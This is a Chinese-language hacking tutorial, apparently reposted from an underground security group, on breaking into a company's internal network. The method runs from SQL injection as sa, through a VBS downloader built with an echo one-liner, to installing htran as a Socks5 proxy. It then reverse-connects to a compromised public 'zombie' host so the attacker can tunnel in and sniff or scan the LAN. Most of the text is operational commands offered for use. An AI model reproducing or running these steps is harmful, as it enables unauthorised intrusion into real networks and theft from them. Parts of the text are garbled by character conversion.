妙用代理滲透内網

資訊來源：邪惡八進制資訊安全團隊

正文

代理在入侵裡的作用-----妙用代理，滲透内網

一、踩點

OS:Windows 2000 + IIS 5.0 + MSSQL

端口:80 21

資料庫放内網，IP為 192.168.1.2 ,更重要的是内網資料庫可以上網.

首頁存在注入漏洞，sa登陸.

注入點:

<a target="_blank" href="http://www.baidu.com/list.asp?id=1">http://www.baidu.com/list.asp?id=1</a>

二、入侵思路

  1.給内網目标機裝個代理伺服器

  2.把弄好的那個代理端口映到公網.

  3.本機用sockscap連接配接公網映的那個端口，這樣，自己也就進到了内網。

  4.接下來就是找共享，嗅探，社會工程學等等了。

三、入侵準備

  1.公網殭屍電腦一隻:218.3.1.1

  2.工具:htran2.4,SocksCap,掃描器一份，NBSI 2.0一份。

  3.A表示資料庫主機,B表示公網殭屍電腦 C表示網站放Web的地方 D表示本機(也在内網)

四、入侵進行時

  1.工具上傳:

在nbsi下執行:

echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(Wscript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(Wscript.Arguments(1)),2 &gt;down.vbs

然後下載下傳工具:

  2.安裝Socks5服務

htran.exe -install   //安裝Socks5服務

htran.exe -start   //啟動Socks5服務

  3.反彈進行時

在B上運作:   htran.exe -s -listen 520 5200   //監聽端口

在nbsi下執行:htran.exe -s -connect 218.3.1.1 520

  3.進入内網

現在用SocksCap連接配接 218.3.1.1 的5200端口，就等于進入了他的内網。

五、滲透内網

  接下來就可以掃描，嗅探，等等，也就是後話了。

六、總結

  文章技術性不高，有錯的地方希望高手指出，偶是菜鳥，也希望這篇文章對大家有所幫助。

偶的朋友可以在我的QQ硬碟裡面下載下傳動畫。在我的個人文章裡面。